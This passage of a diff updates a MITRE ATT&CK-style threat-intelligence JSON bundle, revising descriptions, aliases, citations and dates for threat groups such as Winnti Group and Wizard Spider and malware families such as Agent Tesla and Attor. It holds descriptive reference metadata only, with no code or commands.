- "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "description": "[Tropic Trooper](https://attack.mitre.org/groups/G0081) is an unaffiliated threat group that has led targeted campaigns against targets in Taiwan, the Philippines, and Hong Kong. [Tropic Trooper](https://attack.mitre.org/groups/G0081) focuses on targeting government, healthcare, transportation, and high-tech industries and has been active since 2011.(Citation: TrendMicro Tropic Trooper Mar 2018)(Citation: Unit 42 Tropic Trooper Nov 2016)(Citation: TrendMicro Tropic Trooper May 2020)",
+ "name": "Tropic Trooper",
+ "type": "intrusion-set",
+ "id": "intrusion-set--56319646-eb6e-41fc-ae53-aadfa7adb924",
"aliases": [
"Tropic Trooper",
+ "Pirate Panda",
"KeyBoy"
],
- "modified": "2020-03-30T19:28:54.370Z",
+ "modified": "2020-05-29T03:23:27.843Z",
"created": "2019-01-29T20:17:48.717Z",
"x_mitre_contributors": [
"Edward Millington",
@@ -189911,14 +218157,14 @@
"description": "(Citation: CrowdStrike VENOMOUS BEAR)"
},
{
- "source_name": "Kaspersky Turla",
+ "url": "https://securelist.com/the-epic-turla-operation/65545/",
"description": "Kaspersky Lab's Global Research and Analysis Team. (2014, August 7). The Epic Turla Operation: Solving some of the mysteries of Snake/Uroburos. Retrieved December 11, 2014.",
- "url": "https://securelist.com/the-epic-turla-operation/65545/"
+ "source_name": "Kaspersky Turla"
},
{
- "url": "https://www.welivesecurity.com/wp-content/uploads/2017/08/eset-gazer.pdf",
+ "source_name": "ESET Gazer Aug 2017",
"description": "ESET. (2017, August). Gazing at Gazer: Turla\u2019s new second stage backdoor. Retrieved September 14, 2017.",
- "source_name": "ESET Gazer Aug 2017"
+ "url": "https://www.welivesecurity.com/wp-content/uploads/2017/08/eset-gazer.pdf"
},
{
"url": "https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-march-venomous-bear/",
@@ -189933,12 +218179,12 @@
{
"source_name": "Symantec Waterbug",
"description": "Symantec. (2015, January 26). The Waterbug attack group. Retrieved April 10, 2015.",
- "url": "http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/waterbug-attack-group.pdf"
+ "url": "https://www.threatminer.org/report.php?q=waterbug-attack-group.pdf&y=2015#gsc.tab=0&gsc.q=waterbug-attack-group.pdf&gsc.page=1"
},
{
- "url": "https://securelist.com/introducing-whitebear/81638/",
+ "source_name": "Securelist WhiteBear Aug 2017",
"description": "Kaspersky Lab's Global Research & Analysis Team. (2017, August 30). Introducing WhiteBear. Retrieved September 21, 2017.",
- "source_name": "Securelist WhiteBear Aug 2017"
+ "url": "https://securelist.com/introducing-whitebear/81638/"
},
{
"source_name": "ESET Turla PowerShell May 2019",
@@ -189954,12 +218200,13 @@
"Snake",
"Krypton"
],
- "modified": "2020-03-30T03:08:05.557Z",
+ "modified": "2020-07-06T14:49:46.052Z",
"created": "2017-05-31T21:31:49.816Z",
- "x_mitre_version": "1.3",
"x_mitre_contributors": [
+ "Matthieu Faou, ESET",
"Edward Millington"
- ]
+ ],
+ "x_mitre_version": "1.3"
},
{
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
@@ -189991,20 +218238,89 @@
],
"modified": "2020-03-30T19:31:01.756Z",
"created": "2019-05-24T17:02:44.226Z",
+ "x_mitre_version": "1.1",
"x_mitre_contributors": [
"Lab52 by S2 Grupo"
- ],
- "x_mitre_version": "1.1"
+ ]
},
{
- "type": "intrusion-set",
- "id": "intrusion-set--c5947e1c-1cbc-434c-94b8-27c7e3be0fff",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "name": "Winnti Group",
- "description": "[Winnti Group](https://attack.mitre.org/groups/G0044) is a threat group with Chinese origins that has been active since at least 2010. The group has heavily targeted the gaming industry, but it has also expanded the scope of its targeting. (Citation: Kaspersky Winnti April 2013) (Citation: Kaspersky Winnti June 2015) (Citation: Novetta Winnti April 2015) Some reporting suggests a number of other groups, including [Axiom](https://attack.mitre.org/groups/G0001), [APT17](https://attack.mitre.org/groups/G0025), and [Ke3chang](https://attack.mitre.org/groups/G0004), are closely linked to [Winnti Group](https://attack.mitre.org/groups/G0044). (Citation: 401 TRG Winnti Umbrella May 2018)",
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
+ "external_references": [
+ {
+ "external_id": "G0107",
+ "source_name": "mitre-attack",
+ "url": "https://attack.mitre.org/groups/G0107"
+ },
+ {
+ "source_name": "Symantec Whitefly March 2019",
+ "url": "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/whitefly-espionage-singapore",
+ "description": "Symantec. (2019, March 6). Whitefly: Espionage Group has Singapore in Its Sights. Retrieved May 26, 2020."
+ }
+ ],
+ "description": "[Whitefly](https://attack.mitre.org/groups/G0107) is a cyber espionage group that has been operating since at least 2017. The group has targeted organizations based mostly in Singapore across a wide variety of sectors, and is primarily interested in stealing large amounts of sensitive information. The group has been linked to an attack against Singapore\u2019s largest public health organization, SingHealth.(Citation: Symantec Whitefly March 2019)",
+ "name": "Whitefly",
+ "type": "intrusion-set",
+ "id": "intrusion-set--b74f909f-8e52-4b69-b770-162bf59a1b4e",
+ "aliases": [
+ "Whitefly"
+ ],
+ "modified": "2020-05-27T21:56:24.890Z",
+ "created": "2020-05-26T16:55:09.674Z",
+ "x_mitre_version": "1.0"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "external_references": [
+ {
+ "external_id": "G0112",
+ "source_name": "mitre-attack",
+ "url": "https://attack.mitre.org/groups/G0112"
+ },
+ {
+ "source_name": "Bahamut",
+ "description": "(Citation: SANS Windshift August 2018)"
+ },
+ {
+ "source_name": "SANS Windshift August 2018",
+ "url": "https://www.sans.org/cyber-security-summit/archives/file/summit-archive-1554718868.pdf",
+ "description": "Karim, T. (2018, August). TRAILS OF WINDSHIFT. Retrieved June 25, 2020."
+ },
+ {
+ "source_name": "objective-see windtail1 dec 2018",
+ "url": "https://objective-see.com/blog/blog_0x3B.html",
+ "description": "Wardle, Patrick. (2018, December 20). Middle East Cyber-Espionage analyzing WindShift's implant: OSX.WindTail (part 1). Retrieved October 3, 2019."
+ },
+ {
+ "source_name": "objective-see windtail2 jan 2019",
+ "url": "https://objective-see.com/blog/blog_0x3D.html",
+ "description": "Wardle, Patrick. (2019, January 15). Middle East Cyber-Espionage analyzing WindShift's implant: OSX.WindTail (part 2). Retrieved October 3, 2019."
+ }
+ ],
+ "description": "[Windshift](https://attack.mitre.org/groups/G0112) is a threat group that has been active since at least 2017, targeting specific individuals for surveillance in government departments and critical infrastructure across the Middle East.(Citation: SANS Windshift August 2018)(Citation: objective-see windtail1 dec 2018)(Citation: objective-see windtail2 jan 2019)",
+ "name": "Windshift",
+ "type": "intrusion-set",
+ "id": "intrusion-set--afec6dc3-a18e-4b62-b1a4-5510e1a498d1",
+ "aliases": [
+ "Windshift",
+ "Bahamut"
+ ],
+ "modified": "2020-06-26T13:46:14.122Z",
+ "created": "2020-06-25T17:16:39.168Z",
+ "x_mitre_version": "1.0"
+ },
+ {
+ "created": "2017-05-31T21:32:08.682Z",
+ "modified": "2020-05-04T22:15:08.418Z",
+ "aliases": [
+ "Winnti Group",
+ "Blackfly"
+ ],
"external_references": [
{
"source_name": "mitre-attack",
@@ -190040,22 +218356,75 @@
"source_name": "401 TRG Winnti Umbrella May 2018"
},
{
- "source_name": "Symantec Suckfly March 2016",
+ "url": "http://www.symantec.com/connect/blogs/suckfly-revealing-secret-life-your-code-signing-certificates",
"description": "DiMaggio, J.. (2016, March 15). Suckfly: Revealing the secret life of your code signing certificates. Retrieved August 3, 2016.",
- "url": "http://www.symantec.com/connect/blogs/suckfly-revealing-secret-life-your-code-signing-certificates"
+ "source_name": "Symantec Suckfly March 2016"
}
],
- "aliases": [
- "Winnti Group",
- "Blackfly"
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
- "modified": "2019-03-25T17:15:03.267Z",
- "created": "2017-05-31T21:32:08.682Z",
+ "description": "[Winnti Group](https://attack.mitre.org/groups/G0044) is a threat group with Chinese origins that has been active since at least 2010. The group has heavily targeted the gaming industry, but it has also expanded the scope of its targeting. (Citation: Kaspersky Winnti April 2013) (Citation: Kaspersky Winnti June 2015) (Citation: Novetta Winnti April 2015) Some reporting suggests a number of other groups, including [Axiom](https://attack.mitre.org/groups/G0001), [APT17](https://attack.mitre.org/groups/G0025), and [Ke3chang](https://attack.mitre.org/groups/G0004), are closely linked to [Winnti Group](https://attack.mitre.org/groups/G0044). (Citation: 401 TRG Winnti Umbrella May 2018)",
+ "name": "Winnti Group",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "id": "intrusion-set--c5947e1c-1cbc-434c-94b8-27c7e3be0fff",
+ "type": "intrusion-set",
"x_mitre_version": "1.0",
"x_mitre_contributors": [
"Edward Millington"
]
},
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "external_references": [
+ {
+ "external_id": "G0102",
+ "source_name": "mitre-attack",
+ "url": "https://attack.mitre.org/groups/G0102"
+ },
+ {
+ "source_name": "TEMP.MixMaster",
+ "description": "(Citation: FireEye Ryuk and Trickbot January 2019)"
+ },
+ {
+ "source_name": "Grim Spider",
+ "description": "(Citation: CrowdStrike Ryuk January 2019)(Citation: CrowdStrike Grim Spider May 2019)"
+ },
+ {
+ "source_name": "CrowdStrike Ryuk January 2019",
+ "url": "https://www.crowdstrike.com/blog/big-game-hunting-with-ryuk-another-lucrative-targeted-ransomware/",
+ "description": "Hanel, A. (2019, January 10). Big Game Hunting with Ryuk: Another Lucrative Targeted Ransomware. Retrieved May 12, 2020."
+ },
+ {
+ "source_name": "FireEye Ryuk and Trickbot January 2019",
+ "url": "https://www.fireeye.com/blog/threat-research/2019/01/a-nasty-trick-from-credential-theft-malware-to-business-disruption.html",
+ "description": "Goody, K., et al (2019, January 11). A Nasty Trick: From Credential Theft Malware to Business Disruption. Retrieved May 12, 2020."
+ },
+ {
+ "source_name": "CrowdStrike Grim Spider May 2019",
+ "url": "https://www.crowdstrike.com/blog/timelining-grim-spiders-big-game-hunting-tactics/",
+ "description": "John, E. and Carvey, H. (2019, May 30). Unraveling the Spiderweb: Timelining ATT&CK Artifacts Used by GRIM SPIDER. Retrieved May 12, 2020."
+ }
+ ],
+ "description": "[Wizard Spider](https://attack.mitre.org/groups/G0102) is financially motivated group that has been conducting ransomware campaigns since at least August 2018, primarily targeting large organizations. (Citation: CrowdStrike Ryuk January 2019)",
+ "name": "Wizard Spider",
+ "type": "intrusion-set",
+ "id": "intrusion-set--dd2d9ca6-505b-4860-a604-233685b802c7",
+ "aliases": [
+ "Wizard Spider",
+ "TEMP.MixMaster",
+ "Grim Spider"
+ ],
+ "modified": "2020-06-16T17:30:19.543Z",
+ "created": "2020-05-12T18:15:29.396Z",
+ "x_mitre_version": "1.0",
+ "x_mitre_contributors": [
+ "Oleksiy Gayda"
+ ]
+ },
{
"type": "intrusion-set",
"id": "intrusion-set--16ade1aa-0ea1-4bb7-88cc-9079df2ae756",
@@ -190086,10 +218455,10 @@
],
"modified": "2020-03-18T19:54:59.120Z",
"created": "2017-05-31T21:31:53.579Z",
- "x_mitre_version": "1.2",
"x_mitre_contributors": [
"Tatsuya Daitoku, Cyber Defense Institute, Inc."
- ]
+ ],
+ "x_mitre_version": "1.2"
},
{
"type": "intrusion-set",
@@ -190181,11 +218550,11 @@
],
"modified": "2020-03-30T02:32:34.960Z",
"created": "2017-05-31T21:32:09.054Z",
- "x_mitre_version": "1.4",
"x_mitre_contributors": [
"Edward Millington",
"Michael Cox"
- ]
+ ],
+ "x_mitre_version": "1.4"
},
{
"object_marking_refs": [
@@ -190213,13 +218582,13 @@
],
"modified": "2020-03-30T18:34:04.031Z",
"created": "2017-05-31T21:32:44.131Z",
- "x_mitre_platforms": [
- "Windows"
- ],
+ "x_mitre_version": "1.1",
"x_mitre_aliases": [
"3PARA RAT"
],
- "x_mitre_version": "1.1"
+ "x_mitre_platforms": [
+ "Windows"
+ ]
},
{
"id": "malware--8e461ca3-0996-4e6e-a0df-e2a5bbc51ebc",
@@ -190247,13 +218616,47 @@
],
"modified": "2020-03-30T14:46:14.131Z",
"created": "2017-05-31T21:32:43.664Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"4H RAT"
],
+ "x_mitre_version": "1.1"
+ },
+ {
+ "id": "malware--a0ebedca-d558-4e48-8ff7-4bf76208d90c",
+ "description": "[ABK](https://attack.mitre.org/software/S0469) is a downloader that has been used by [BRONZE BUTLER](https://attack.mitre.org/groups/G0060) since at least 2019.(Citation: Trend Micro Tick November 2019)",
+ "name": "ABK",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "external_references": [
+ {
+ "external_id": "S0469",
+ "source_name": "mitre-attack",
+ "url": "https://attack.mitre.org/software/S0469"
+ },
+ {
+ "source_name": "Trend Micro Tick November 2019",
+ "url": "https://documents.trendmicro.com/assets/pdf/Operation-ENDTRADE-TICK-s-Multi-Stage-Backdoors-for-Attacking-Industries-and-Stealing-Classified-Data.pdf",
+ "description": "Chen, J. et al. (2019, November). Operation ENDTRADE: TICK\u2019s Multi-Stage Backdoors for Attacking Industries and Stealing Classified Data. Retrieved June 9, 2020."
+ }
+ ],
+ "type": "malware",
+ "labels": [
+ "malware"
+ ],
+ "modified": "2020-06-24T15:34:14.618Z",
+ "created": "2020-06-10T16:58:56.032Z",
"x_mitre_platforms": [
"Windows"
- ]
+ ],
+ "x_mitre_aliases": [
+ "ABK"
+ ],
+ "x_mitre_version": "1.0"
},
{
"id": "malware--fb575479-14ef-41e9-bfab-0b7cf10bec73",
@@ -190286,7 +218689,9 @@
],
"modified": "2020-03-30T01:44:19.899Z",
"created": "2017-05-31T21:32:34.648Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"ADVSTORESHELL",
"AZZY",
@@ -190294,9 +218699,7 @@
"NETUI",
"Sedreco"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.1"
},
{
"id": "malware--56f46b17-8cfa-46c0-b501-dd52fef394e2",
@@ -190324,16 +218727,23 @@
],
"modified": "2020-03-30T14:48:21.994Z",
"created": "2017-05-31T21:32:47.879Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"ASPXSpy",
"ASPXTool"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.1"
},
{
+ "id": "malware--e7a5229f-05eb-440e-b982-9a6d2b2b87c8",
+ "name": "Agent Tesla",
+ "description": "[Agent Tesla](https://attack.mitre.org/software/S0331) is a spyware Trojan written for the .NET framework that has been observed since at least 2014.(Citation: Fortinet Agent Tesla April 2018)(Citation: Bitdefender Agent Tesla April 2020)(Citation: Malwarebytes Agent Tesla April 2020)",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
"external_references": [
{
"external_id": "S0331",
@@ -190349,6 +218759,16 @@
"url": "https://www.fortinet.com/blog/threat-research/analysis-of-new-agent-tesla-spyware-variant.html",
"source_name": "Fortinet Agent Tesla April 2018"
},
+ {
+ "source_name": "Bitdefender Agent Tesla April 2020",
+ "url": "https://labs.bitdefender.com/2020/04/oil-gas-spearphishing-campaigns-drop-agent-tesla-spyware-in-advance-of-historic-opec-deal/",
+ "description": "Arsene, L. (2020, April 21). Oil & Gas Spearphishing Campaigns Drop Agent Tesla Spyware in Advance of Historic OPEC+ Deal. Retrieved May 19, 2020."
+ },
+ {
+ "source_name": "Malwarebytes Agent Tesla April 2020",
+ "url": "https://blog.malwarebytes.com/threat-analysis/2020/04/new-agenttesla-variant-steals-wifi-credentials/",
+ "description": "Jazi, H. (2020, April 16). New AgentTesla variant steals WiFi credentials. Retrieved May 19, 2020."
+ },
{
"description": "Brumaghin, E., et al. (2018, October 15). Old dog, new tricks - Analysing new RTF-based campaign distributing Agent Tesla, Loki with PyREbox. Retrieved November 5, 2018.",
"url": "https://blog.talosintelligence.com/2018/10/old-dog-new-tricks-analysing-new-rtf_15.html",
@@ -190360,18 +218780,11 @@
"description": "The DigiTrust Group. (2017, January 12). The Rise of Agent Tesla. Retrieved November 5, 2018."
}
],
- "object_marking_refs": [
- "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
- ],
- "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "description": "[Agent Tesla](https://attack.mitre.org/software/S0331) is a spyware Trojan written in visual basic.(Citation: Fortinet Agent Tesla April 2018)",
- "name": "Agent Tesla",
- "id": "malware--e7a5229f-05eb-440e-b982-9a6d2b2b87c8",
"type": "malware",
"labels": [
"malware"
],
- "modified": "2020-03-30T14:49:42.437Z",
+ "modified": "2020-05-28T23:41:03.616Z",
"created": "2019-01-29T18:44:04.748Z",
"x_mitre_platforms": [
"Windows"
@@ -190407,10 +218820,44 @@
],
"modified": "2020-03-30T14:50:51.213Z",
"created": "2017-05-31T21:32:59.153Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"Agent.btz"
],
+ "x_mitre_version": "1.1"
+ },
+ {
+ "external_references": [
+ {
+ "external_id": "S0456",
+ "source_name": "mitre-attack",
+ "url": "https://attack.mitre.org/software/S0456"
+ },
+ {
+ "source_name": "CheckPoint Naikon May 2020",
+ "url": "https://research.checkpoint.com/2020/naikon-apt-cyber-espionage-reloaded/",
+ "description": "CheckPoint. (2020, May 7). Naikon APT: Cyber Espionage Reloaded. Retrieved May 26, 2020."
+ }
+ ],
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "description": "[Aria-body](https://attack.mitre.org/software/S0456) is a custom backdoor that has been used by [Naikon](https://attack.mitre.org/groups/G0019).(Citation: CheckPoint Naikon May 2020)",
+ "name": "Aria-body",
+ "id": "malware--3161d76a-e2b2-4b97-9906-24909b735386",
+ "type": "malware",
+ "labels": [
+ "malware"
+ ],
+ "modified": "2020-07-03T21:52:44.685Z",
+ "created": "2020-05-26T19:36:04.663Z",
+ "x_mitre_version": "1.0",
+ "x_mitre_aliases": [
+ "Aria-body"
+ ],
"x_mitre_platforms": [
"Windows"
]
@@ -190444,17 +218891,58 @@
"labels": [
"malware"
],
- "modified": "2020-03-20T18:03:27.878Z",
+ "modified": "2020-06-23T19:38:54.935Z",
"created": "2019-04-17T13:46:38.565Z",
- "x_mitre_version": "1.2",
- "x_mitre_aliases": [
- "Astaroth"
+ "x_mitre_contributors": [
+ "Carlos Borges, @huntingneo, CIP"
],
"x_mitre_platforms": [
"Windows"
],
+ "x_mitre_aliases": [
+ "Astaroth"
+ ],
+ "x_mitre_version": "1.2"
+ },
+ {
+ "external_references": [
+ {
+ "external_id": "S0438",
+ "source_name": "mitre-attack",
+ "url": "https://attack.mitre.org/software/S0438"
+ },
+ {
+ "source_name": "Attor",
+ "description": "(Citation: ESET Attor Oct 2019)"
+ },
+ {
+ "source_name": "ESET Attor Oct 2019",
+ "url": "https://www.welivesecurity.com/wp-content/uploads/2019/10/ESET_Attor.pdf",
+ "description": "Hromcova, Z. (2019, October). AT COMMANDS, TOR-BASED COMMUNICATIONS: MEET ATTOR, A FANTASY CREATURE AND ALSO A SPY PLATFORM. Retrieved May 6, 2020."
+ }
+ ],
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "description": "[Attor](https://attack.mitre.org/software/S0438) is a Windows-based espionage platform that has been seen in use since 2013. [Attor](https://attack.mitre.org/software/S0438) has a loadable plugin architecture to customize functionality for specific targets.(Citation: ESET Attor Oct 2019)",
+ "name": "Attor",
+ "id": "malware--8f423bd7-6ca7-4303-9e85-008c7ad5fdaa",
+ "type": "malware",
+ "labels": [
+ "malware"
+ ],
+ "modified": "2020-07-07T12:35:11.897Z",
+ "created": "2020-05-06T20:26:15.141Z",
"x_mitre_contributors": [
- "Carlos Borges, @huntingneo, CIP"
+ "ESET"
+ ],
+ "x_mitre_version": "1.0",
+ "x_mitre_aliases": [
+ "Attor"
+ ],
+ "x_mitre_platforms": [
+ "Windows"
]
},
{
@@ -190491,14 +218979,14 @@
],
"modified": "2020-03-30T14:51:50.371Z",
"created": "2019-01-30T15:47:41.018Z",
- "x_mitre_platforms": [
- "Windows"
- ],
+ "x_mitre_version": "1.1",
"x_mitre_aliases": [
"AuditCred",
"Roptimizer"
],
- "x_mitre_version": "1.1"
+ "x_mitre_platforms": [
+ "Windows"
+ ]
},
{
"id": "malware--f5352566-1a64-49ac-8f7f-97e1d1a03300",
@@ -190526,10 +219014,44 @@
],
"modified": "2020-03-30T14:52:48.605Z",
"created": "2017-05-31T21:33:14.551Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"AutoIt backdoor"
],
+ "x_mitre_version": "1.1"
+ },
+ {
+ "external_references": [
+ {
+ "external_id": "S0473",
+ "source_name": "mitre-attack",
+ "url": "https://attack.mitre.org/software/S0473"
+ },
+ {
+ "source_name": "Trend Micro Tick November 2019",
+ "url": "https://documents.trendmicro.com/assets/pdf/Operation-ENDTRADE-TICK-s-Multi-Stage-Backdoors-for-Attacking-Industries-and-Stealing-Classified-Data.pdf",
+ "description": "Chen, J. et al. (2019, November). Operation ENDTRADE: TICK\u2019s Multi-Stage Backdoors for Attacking Industries and Stealing Classified Data. Retrieved June 9, 2020."
+ }
+ ],
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "name": "Avenger",
+ "description": "[Avenger](https://attack.mitre.org/software/S0473) is a downloader that has been used by [BRONZE BUTLER](https://attack.mitre.org/groups/G0060) since at least 2019.(Citation: Trend Micro Tick November 2019)",
+ "id": "malware--36ede314-7db4-4d09-b53d-81bbfbe5f6f8",
+ "type": "malware",
+ "labels": [
+ "malware"
+ ],
+ "modified": "2020-06-24T17:44:18.663Z",
+ "created": "2020-06-11T15:24:48.709Z",
+ "x_mitre_version": "1.0",
+ "x_mitre_aliases": [
+ "Avenger"
+ ],
"x_mitre_platforms": [
"Windows"
]
@@ -190569,13 +219091,13 @@
],
"modified": "2020-03-30T14:56:50.733Z",
"created": "2019-01-30T15:19:14.309Z",
- "x_mitre_version": "1.2",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"Azorult"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.2"
},
{
"id": "malware--fb261c56-b80e-43a9-8351-c84081e7213d",
@@ -190603,14 +219125,14 @@
],
"modified": "2020-03-30T14:54:21.256Z",
"created": "2017-05-31T21:32:24.428Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"BACKSPACE",
"Lecna"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.1"
},
{
"id": "malware--9dbdadb6-fdbf-490f-a35f-38762d06a0d2",
@@ -190642,13 +219164,13 @@
],
"modified": "2020-03-30T18:32:03.328Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"BADCALL"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.1"
},
{
"id": "malware--e9595678-d269-469e-ae6b-75e49259de63",
@@ -190685,10 +219207,44 @@
],
"modified": "2020-03-30T02:25:10.616Z",
"created": "2017-05-31T21:33:14.118Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"BADNEWS"
],
+ "x_mitre_version": "1.1"
+ },
+ {
+ "external_references": [
+ {
+ "external_id": "S0470",
+ "source_name": "mitre-attack",
+ "url": "https://attack.mitre.org/software/S0470"
+ },
+ {
+ "source_name": "Trend Micro Tick November 2019",
+ "url": "https://documents.trendmicro.com/assets/pdf/Operation-ENDTRADE-TICK-s-Multi-Stage-Backdoors-for-Attacking-Industries-and-Stealing-Classified-Data.pdf",
+ "description": "Chen, J. et al. (2019, November). Operation ENDTRADE: TICK\u2019s Multi-Stage Backdoors for Attacking Industries and Stealing Classified Data. Retrieved June 9, 2020."
+ }
+ ],
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "description": "[BBK](https://attack.mitre.org/software/S0470) is a downloader that has been used by [BRONZE BUTLER](https://attack.mitre.org/groups/G0060) since at least 2019.(Citation: Trend Micro Tick November 2019)",
+ "name": "BBK",
+ "id": "malware--f0fc920e-57a3-4af5-89be-9ea594c8b1ea",
+ "type": "malware",
+ "labels": [
+ "malware"
+ ],
+ "modified": "2020-06-24T15:36:00.792Z",
+ "created": "2020-06-10T18:00:28.497Z",
+ "x_mitre_version": "1.0",
+ "x_mitre_aliases": [
+ "BBK"
+ ],
"x_mitre_platforms": [
"Windows"
]
@@ -190719,13 +219275,13 @@
],
"modified": "2020-03-30T14:55:06.553Z",
"created": "2017-05-31T21:33:13.664Z",
- "x_mitre_version": "1.2",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"BBSRAT"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.2"
},
{
"id": "malware--b8eb28e4-48a6-40ae-951a-328714f75eda",
@@ -190762,13 +219318,13 @@
],
"modified": "2020-03-30T14:57:52.169Z",
"created": "2017-05-31T21:32:17.147Z",
- "x_mitre_version": "1.2",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"BISCUIT"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.2"
},
{
"id": "malware--d69c8146-ab35-4d50-8382-6fc80e641d43",
@@ -190805,15 +219361,21 @@
],
"modified": "2020-03-30T14:58:42.298Z",
"created": "2017-05-31T21:32:45.892Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"BLACKCOFFEE"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.1"
},
{
+ "created": "2019-02-18T20:16:12.119Z",
+ "modified": "2020-03-30T15:22:05.356Z",
+ "labels": [
+ "malware"
+ ],
+ "type": "malware",
"id": "malware--d5268dfb-ae2b-4e0e-ac07-02a460613d8a",
"description": "[BONDUPDATER](https://attack.mitre.org/software/S0360) is a PowerShell backdoor used by [OilRig](https://attack.mitre.org/groups/G0049). It was first observed in November 2017 during targeting of a Middle Eastern government organization, and an updated version was observed in August 2018 being used to target a government organization with spearphishing emails.(Citation: FireEye APT34 Dec 2017)(Citation: Palo Alto OilRig Sep 2018)",
"name": "BONDUPDATER",
@@ -190838,19 +219400,13 @@
"description": "Wilhoit, K. and Falcone, R. (2018, September 12). OilRig Uses Updated BONDUPDATER to Target Middle Eastern Government. Retrieved February 18, 2019."
}
],
- "type": "malware",
- "labels": [
- "malware"
+ "x_mitre_platforms": [
+ "Windows"
],
- "modified": "2020-03-30T15:22:05.356Z",
- "created": "2019-02-18T20:16:12.119Z",
- "x_mitre_version": "1.2",
"x_mitre_aliases": [
"BONDUPDATER"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.2"
},
{
"external_references": [
@@ -190878,13 +219434,13 @@
],
"modified": "2019-10-15T17:07:57.638Z",
"created": "2019-10-11T16:04:31.994Z",
- "x_mitre_platforms": [
- "Windows"
- ],
+ "x_mitre_version": "1.0",
"x_mitre_aliases": [
"BOOSTWRITE"
],
- "x_mitre_version": "1.0"
+ "x_mitre_platforms": [
+ "Windows"
+ ]
},
{
"object_marking_refs": [
@@ -190897,12 +219453,22 @@
"external_id": "S0114"
},
{
- "source_name": "MTrends 2016",
- "description": "Mandiant. (2016, February). M-Trends 2016. Retrieved January 4, 2017.",
- "url": "https://www.fireeye.com/content/dam/fireeye-www/regional/fr_FR/offers/pdfs/ig-mtrends-2016.pdf"
+ "source_name": "Mandiant M Trends 2016",
+ "url": "https://www.fireeye.com/content/dam/fireeye-www/current-threats/pdfs/rpt-mtrends-2016.pdf",
+ "description": "Mandiant. (2016, February 25). Mandiant M-Trends 2016. Retrieved March 5, 2019."
+ },
+ {
+ "url": "https://www.fireeye.com/blog/threat-research/2015/12/fin1-targets-boot-record.html",
+ "description": "Andonov, D., et al. (2015, December 7). Thriving Beyond The Operating System: Financial Threat Group Targets Volume Boot Record. Retrieved May 13, 2016.",
+ "source_name": "FireEye Bootkits"
+ },
+ {
